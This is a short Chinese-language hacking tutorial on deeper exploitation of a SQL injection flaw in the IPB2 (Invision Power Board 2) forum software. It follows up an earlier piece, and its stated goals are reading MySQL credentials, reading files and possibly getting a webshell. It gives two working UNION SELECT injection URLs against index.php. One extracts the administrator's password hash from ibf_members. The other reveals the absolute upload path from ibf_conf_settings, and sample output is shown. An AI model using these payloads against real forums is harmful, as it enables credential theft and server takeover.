网络通信 频道

IPB2注入漏洞的深入利用

 

    在上一篇《PHP+MySQL注入导出文件的新发现——附带IPB2的漏洞利用》,利用IPB2的注入漏洞获得管理员的资料,修改COOKIE可以得到前台的管理权限。不少人埋怨没有什么用,其实这个是大多数人不了解IPB2的原因。

    因为过滤了很多特殊字符,包括单引号,全部转为十进制了。

    其实充分发挥一下想象力。也是有可能拿到后台管理员或者webshell的,注意,是可能,因为这个并不是通杀的,为什么不是通杀的,往下看就知道了。

    我也不多说了。对于这个,我看最直接的目的就是看MYSQL的连接信息。怎么看?读文件呗!

    我想不管是读文件和上传,这个注入漏洞都给我们提供了最直接的条件,如果了解IPB2的人就应该知道。上传的目录是保存数据库里的,因此。我们根本不需要怎么提交、不需要构造什么变量去报错暴路径,IPB2也没有这个条件去暴这些信息。就算出错也只返回特定的信息。

    IPB2的上传目录的路径是保存在ibf_conf_settings表里,所以我们可以构造SQL语句,把这个路径给直接反馈到眼前。

http://localhost/ipb2/index.php?act=Post&CODE=02&f=2&t=1&qpid=1)%20and%201=2%20union%20select%201, 2, 3, 4, 5, 6, 7, 8, 9, 10, member_login_key, 12, 13, 14, 15, 16, 17, 18, 19, 1%20from%20ibf_members%20where%20id=1%20/*

    这样是读取id为1的用户的密码散列,同样的,我们如果提交:

http://localhost/ipb2/index.php?act=Post&CODE=02&f=2&t=1&qpid=1)%20and%201=2%20union%20select%201, 2, 3, 4, 5, 6, 7, 8, 9, 10, conf_value, 12, 13, 14, 15, 16, 17, 18, 19, 1%20from%20ibf_conf_settings%20where%20conf_id=59%20/*

    就会返回上传目录的绝对路径:

[quote=5,Jan 1 1970, 08:00 AM]

h:/www/ipb2/uploads

[right][snapback]1[/snapback][/right]

[/quote]

0
相关文章